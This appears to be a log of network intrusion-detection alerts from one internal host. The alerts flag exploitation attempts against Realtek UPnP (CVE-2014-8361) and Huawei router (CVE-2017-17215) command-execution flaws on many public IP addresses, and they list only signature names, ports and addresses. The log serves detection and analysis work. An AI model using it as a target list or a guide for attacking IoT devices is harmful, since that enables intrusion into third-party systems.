                                      07/20/24-23:01:42.322405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614948452869192.168.2.235.80.243.157
                                      07/20/24-23:01:21.909111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862437215192.168.2.2341.106.80.160
                                      07/20/24-23:01:21.937814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538837215192.168.2.23213.191.23.16
                                      07/20/24-23:01:41.286911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613338852869192.168.2.23100.224.33.210
                                      07/20/24-23:01:42.869520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5891052869192.168.2.23160.195.41.193
                                      07/20/24-23:01:24.934684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650637215192.168.2.2341.195.231.185
                                      07/20/24-23:01:41.722890TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23854852869192.168.2.2335.242.111.156
                                      07/20/24-23:00:59.161892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279837215192.168.2.23157.71.150.37
                                      07/20/24-23:01:41.909668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4242052869192.168.2.23184.207.38.235
                                      07/20/24-23:01:49.553791TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23348452869192.168.2.2324.80.173.172
                                      07/20/24-23:01:51.288562TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23835052869192.168.2.2320.232.50.163
                                      07/20/24-23:02:21.004725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5650852869192.168.2.23125.106.198.203
                                      07/20/24-23:01:52.041756TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3688852869192.168.2.23135.204.232.202
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762437215192.168.2.2341.245.116.58
                                      07/20/24-23:01:43.180913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615443852869192.168.2.23219.230.144.186
                                      07/20/24-23:01:55.125263TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615747052869192.168.2.23119.217.160.56
                                      07/20/24-23:01:31.323042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4322652869192.168.2.2319.16.79.3
                                      07/20/24-23:01:57.101402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3472252869192.168.2.23117.106.84.138
                                      07/20/24-23:01:13.310941TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613429852869192.168.2.23144.166.152.235
                                      07/20/24-23:01:02.304416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3765452869192.168.2.23162.220.3.30
                                      07/20/24-23:01:21.951975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317437215192.168.2.2341.50.198.124
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395837215192.168.2.2341.129.118.181
                                      07/20/24-23:01:55.366575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3373052869192.168.2.23112.243.101.70
                                      07/20/24-23:01:11.636425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065237215192.168.2.23197.24.62.182
                                      07/20/24-23:01:45.075399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613596252869192.168.2.23162.100.122.131
                                      07/20/24-23:01:31.323042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3888052869192.168.2.23145.117.47.181
                                      07/20/24-23:01:43.895586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5213852869192.168.2.23171.210.7.241
                                      07/20/24-23:01:24.990022TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615646452869192.168.2.2385.173.195.222
                                      07/20/24-23:01:58.035425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615262652869192.168.2.2383.28.127.148
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855837215192.168.2.23158.105.50.58
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295637215192.168.2.2341.12.12.126
                                      07/20/24-23:01:55.546480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662452869192.168.2.23174.141.27.208
                                      07/20/24-23:01:50.901722TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613288652869192.168.2.23141.38.115.93
                                      07/20/24-23:02:03.068984TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615255252869192.168.2.2348.103.95.129
                                      07/20/24-23:01:53.267116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25710052869192.168.2.2367.228.135.229
                                      07/20/24-23:01:25.288586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3327452869192.168.2.2347.20.172.49
                                      07/20/24-23:01:42.499887TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614286452869192.168.2.23199.182.118.208
                                      07/20/24-23:01:42.786028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5651852869192.168.2.23200.107.251.119
                                      07/20/24-23:00:59.213564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064637215192.168.2.23198.189.132.142
                                      07/20/24-23:01:31.976649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728637215192.168.2.2341.134.23.85
                                      07/20/24-23:01:47.474975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613643452869192.168.2.2313.165.214.181
                                      07/20/24-23:01:08.700029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4464452869192.168.2.23174.56.72.194
                                      07/20/24-23:01:49.232174TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5151052869192.168.2.2386.212.150.4
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528437215192.168.2.2341.73.64.241
                                      07/20/24-23:02:05.476791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614984252869192.168.2.2383.250.249.17
                                      07/20/24-23:01:42.890948TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614994252869192.168.2.23149.51.58.185
                                      07/20/24-23:01:08.588009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4868652869192.168.2.23210.116.25.221
                                      07/20/24-23:01:54.053348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4815252869192.168.2.23212.188.148.79
                                      07/20/24-23:01:46.241196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26024252869192.168.2.23167.230.66.89
                                      07/20/24-23:02:14.686790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3548452869192.168.2.2392.131.8.148
                                      07/20/24-23:00:57.222279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733237215192.168.2.23197.146.199.163
                                      07/20/24-23:02:09.095115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613568652869192.168.2.2377.112.214.83
                                      07/20/24-23:01:24.833522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4823652869192.168.2.2348.111.4.84
                                      07/20/24-23:01:51.944007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6076652869192.168.2.23194.155.182.26
                                      07/20/24-23:01:56.210612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5937252869192.168.2.23193.18.125.219
                                      07/20/24-23:01:02.090403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613669452869192.168.2.23153.0.45.254
                                      07/20/24-23:01:08.585790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5326452869192.168.2.23194.63.61.192
                                      07/20/24-23:01:46.580798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4413252869192.168.2.23191.8.175.218
                                      07/20/24-23:01:43.965873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615153452869192.168.2.23202.170.123.220
                                      07/20/24-23:01:58.751559TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4349252869192.168.2.23206.198.46.124
                                      07/20/24-23:01:31.327808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4625052869192.168.2.2349.81.102.7
                                      07/20/24-23:01:45.735394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429852869192.168.2.23223.75.101.67
                                      07/20/24-23:01:02.059312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492237215192.168.2.23202.106.145.234
                                      07/20/24-23:01:20.601040TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615701652869192.168.2.2385.106.41.174
                                      07/20/24-23:01:58.249115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614079452869192.168.2.2334.100.42.211
                                      07/20/24-23:01:31.991548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721837215192.168.2.23197.42.75.0
                                      07/20/24-23:01:42.719940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3778852869192.168.2.23132.116.164.169
                                      07/20/24-23:01:43.173843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4837652869192.168.2.2364.190.167.168
                                      07/20/24-23:01:14.111381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017237215192.168.2.23195.93.174.118
                                      07/20/24-23:01:31.975107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016237215192.168.2.2341.66.153.204
                                      07/20/24-23:01:32.060731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003637215192.168.2.23137.86.119.85
                                      07/20/24-23:01:43.906354TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24055252869192.168.2.23169.102.32.106
                                      07/20/24-23:01:55.497526TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5553652869192.168.2.23135.85.2.136
                                      07/20/24-23:01:50.418920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5640052869192.168.2.2379.45.122.255
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.23197.182.114.212
                                      07/20/24-23:01:43.288086TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615726052869192.168.2.2317.63.153.183
                                      07/20/24-23:01:48.322055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5327052869192.168.2.23134.173.191.58
                                      07/20/24-23:01:04.082384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740037215192.168.2.2341.185.218.214
                                      07/20/24-23:01:13.972649TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614740052869192.168.2.23113.195.103.231
                                      07/20/24-23:01:08.597662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5501052869192.168.2.23139.37.94.236
                                      07/20/24-23:01:31.322110TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476652869192.168.2.23109.162.13.246
                                      07/20/24-23:01:01.271651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6077252869192.168.2.23195.67.134.63
                                      07/20/24-23:01:42.869521TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5682852869192.168.2.2342.7.66.220
                                      07/20/24-23:01:52.285243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4785052869192.168.2.23126.2.96.116
                                      07/20/24-23:01:25.819962TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614993652869192.168.2.23156.32.87.120
                                      07/20/24-23:01:09.027075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288052869192.168.2.23189.63.115.173
                                      07/20/24-23:01:44.674251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24945652869192.168.2.2337.192.4.35
                                      07/20/24-23:01:27.660099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625037215192.168.2.2366.67.190.136
                                      07/20/24-23:01:50.985732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24178652869192.168.2.23209.10.74.49
                                      07/20/24-23:01:21.951975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426037215192.168.2.23197.168.17.251
                                      07/20/24-23:01:51.183470TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615904452869192.168.2.23167.207.100.170
                                      07/20/24-23:01:08.630327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3407852869192.168.2.23195.64.245.14
                                      07/20/24-23:00:57.221248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800037215192.168.2.2341.143.61.103
                                      07/20/24-23:02:06.441271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4622652869192.168.2.2336.224.134.244
                                      07/20/24-23:01:44.277250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386452869192.168.2.23123.147.61.106
                                      07/20/24-23:01:07.061779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932437215192.168.2.23136.131.38.133
                                      07/20/24-23:01:47.693711TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25845052869192.168.2.23125.188.157.139
                                      07/20/24-23:00:57.221145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688637215192.168.2.2317.113.7.103
                                      07/20/24-23:01:54.482793TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614205852869192.168.2.23163.75.91.9
                                      07/20/24-23:02:08.206268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5303452869192.168.2.2327.234.34.183
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.23157.44.1.200
                                      07/20/24-23:01:59.296959TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24994852869192.168.2.23118.179.102.207
                                      07/20/24-23:00:59.158278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326237215192.168.2.2341.232.172.92
                                      07/20/24-23:01:41.676253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25874252869192.168.2.23157.9.32.210
                                      07/20/24-23:01:51.212550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096452869192.168.2.2388.239.244.206
                                      07/20/24-23:01:41.238000TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5264252869192.168.2.23190.125.30.210
                                      07/20/24-23:01:42.728248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3724852869192.168.2.2389.174.70.107
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881437215192.168.2.23197.26.40.97
                                      07/20/24-23:01:48.834295TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615862252869192.168.2.2371.14.67.20
                                      07/20/24-23:01:42.692028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25798452869192.168.2.2312.110.126.98
                                      07/20/24-23:01:03.102525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3607252869192.168.2.232.10.234.63
                                      07/20/24-23:01:48.955750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6008052869192.168.2.23105.224.21.3
                                      07/20/24-23:02:11.791090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614726052869192.168.2.2384.123.73.220
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901037215192.168.2.23157.24.24.246
                                      07/20/24-23:01:08.629615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5909852869192.168.2.23170.225.184.185
                                      07/20/24-23:02:07.294006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3710852869192.168.2.23194.45.44.116
                                      07/20/24-23:01:42.101588TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25384852869192.168.2.23207.162.61.245
                                      07/20/24-23:01:45.484813TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4132252869192.168.2.23222.227.230.240
                                      07/20/24-23:01:44.993925TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25999452869192.168.2.23161.245.24.12
                                      07/20/24-23:01:21.938818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794437215192.168.2.23206.153.203.206
                                      07/20/24-23:01:31.328855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5388852869192.168.2.23203.166.233.2
                                      07/20/24-23:01:24.596580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613811652869192.168.2.2361.127.88.100
                                      07/20/24-23:02:05.835826TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4820652869192.168.2.23141.221.231.245
                                      07/20/24-23:01:46.483452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24068052869192.168.2.2387.254.251.88
                                      07/20/24-23:01:47.962852TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613488652869192.168.2.23191.208.197.76
                                      07/20/24-23:01:42.729310TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24867652869192.168.2.23159.222.212.200
                                      07/20/24-23:01:04.595913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615227652869192.168.2.2391.233.41.28
                                      07/20/24-23:01:58.688552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3788052869192.168.2.23131.180.1.65
                                      07/20/24-23:01:41.758923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5862852869192.168.2.2320.44.163.254
                                      07/20/24-23:00:57.222163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344037215192.168.2.23197.212.61.129
                                      07/20/24-23:01:44.468208TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5076652869192.168.2.23133.169.65.78
                                      07/20/24-23:01:20.110860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053237215192.168.2.23157.87.180.92
                                      07/20/24-23:01:27.730585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5271037215192.168.2.2341.253.120.16
                                      07/20/24-23:00:57.221017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453637215192.168.2.23197.76.203.13
                                      07/20/24-23:01:42.485253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5044852869192.168.2.23145.203.252.98
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5730437215192.168.2.23157.58.211.164
                                      07/20/24-23:01:40.343151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983837215192.168.2.23197.236.217.25
                                      07/20/24-23:01:44.945183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3377852869192.168.2.2334.82.199.243
                                      07/20/24-23:01:02.146232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525237215192.168.2.2341.155.25.219
                                      07/20/24-23:01:27.725851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085437215192.168.2.2341.140.237.44
                                      07/20/24-23:01:43.841155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4791052869192.168.2.23133.172.125.251
                                      07/20/24-23:01:45.109958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615156252869192.168.2.23190.1.92.156
                                      07/20/24-23:01:43.380019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4967452869192.168.2.23128.197.233.56
                                      07/20/24-23:01:42.010169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3649252869192.168.2.23186.68.76.128
                                      07/20/24-23:01:42.519318TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615359252869192.168.2.23196.168.75.104
                                      07/20/24-23:01:43.392835TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23638452869192.168.2.23202.8.238.183
                                      07/20/24-23:01:44.732056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4936052869192.168.2.23154.167.112.208
                                      07/20/24-23:01:52.569791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615250652869192.168.2.2365.85.212.42
                                      07/20/24-23:01:02.127340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496837215192.168.2.2358.225.246.95
                                      07/20/24-23:02:37.123706TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614269252869192.168.2.2390.118.44.58
                                      07/20/24-23:01:24.889164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929237215192.168.2.23157.59.34.22
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4983637215192.168.2.23197.55.44.167
                                      07/20/24-23:01:42.693537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4493652869192.168.2.23157.155.242.14
                                      07/20/24-23:01:41.459025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4273852869192.168.2.2369.239.30.22
                                      07/20/24-23:02:03.032025TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615885452869192.168.2.2360.191.4.143
                                      07/20/24-23:01:12.813695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23674052869192.168.2.23126.12.83.193
                                      07/20/24-23:01:53.665550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26037852869192.168.2.23153.51.4.30
                                      07/20/24-23:01:11.634077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708237215192.168.2.2341.36.118.151
                                      07/20/24-23:01:02.093903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916437215192.168.2.2371.240.106.220
                                      07/20/24-23:00:59.154068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325237215192.168.2.2372.152.128.124
                                      07/20/24-23:01:44.252201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387052869192.168.2.23207.27.209.75
                                      07/20/24-23:01:20.132511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790637215192.168.2.2341.11.151.145
                                      07/20/24-23:01:41.332211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615147052869192.168.2.23220.250.27.9
                                      07/20/24-23:01:44.491060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614852052869192.168.2.23121.218.112.247
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852837215192.168.2.23157.194.207.76
                                      07/20/24-23:01:40.334934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259037215192.168.2.23197.67.65.109
                                      07/20/24-23:01:47.775082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25507852869192.168.2.23165.18.43.140
                                      07/20/24-23:01:54.940318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4631252869192.168.2.23218.205.210.219
                                      07/20/24-23:01:46.289412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5916652869192.168.2.231.132.71.9
                                      07/20/24-23:01:48.187360TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23888252869192.168.2.23118.191.35.155
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740637215192.168.2.23157.87.175.0
                                      07/20/24-23:01:44.706302TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23804852869192.168.2.23107.79.192.172
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392037215192.168.2.23187.182.184.30
                                      07/20/24-23:01:44.318262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614488052869192.168.2.23223.217.31.58
                                      07/20/24-23:01:31.314147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24716652869192.168.2.23136.18.44.19
                                      07/20/24-23:01:45.511523TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24987852869192.168.2.23113.71.166.108
                                      07/20/24-23:01:47.943232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25052652869192.168.2.23108.46.15.204
